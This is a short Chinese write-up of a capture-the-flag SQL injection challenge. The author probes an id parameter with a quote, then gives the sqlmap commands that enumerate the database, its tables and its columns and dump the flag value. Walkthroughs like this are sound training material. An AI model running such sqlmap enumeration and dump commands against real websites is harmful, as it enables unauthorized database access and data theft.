![](https://img.haomeiwen.com/i14976963/ed319b20383464c4.png)
首先看这道题,打开链接如图
![](https://img.haomeiwen.com/i14976963/26ee8ae57469e38a.png)
此题的url为
![](https://img.haomeiwen.com/i14976963/f737d9c475de58d9.png)
发现结尾有id的属性值,手工检测是否存在sql注入(网上查了用经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞),结果如下
![](https://img.haomeiwen.com/i14976963/0137ca0ab4e58e12.png)
发现果然有一个sql注入,于是复制url用sqlmap爆一下数据库,运用命令# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
![](https://img.haomeiwen.com/i14976963/42a4f79c3f31a5a8.png)
![](https://img.haomeiwen.com/i14976963/f44f625578bc596e.png)
发现是my_db数据库,于是继续运用命令# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables查看一下表
![](https://img.haomeiwen.com/i14976963/95acb8f14d6c7240.png)
发现有一个thiskey,flag应该就在这里面,于是继续查看一下列# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
![](https://img.haomeiwen.com/i14976963/107dfce5992295fc.png)
然后继续用# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
![](https://img.haomeiwen.com/i14976963/1e2e4d9a1fb82c27.png)
最后得到key:whatiMyD91dump
网友评论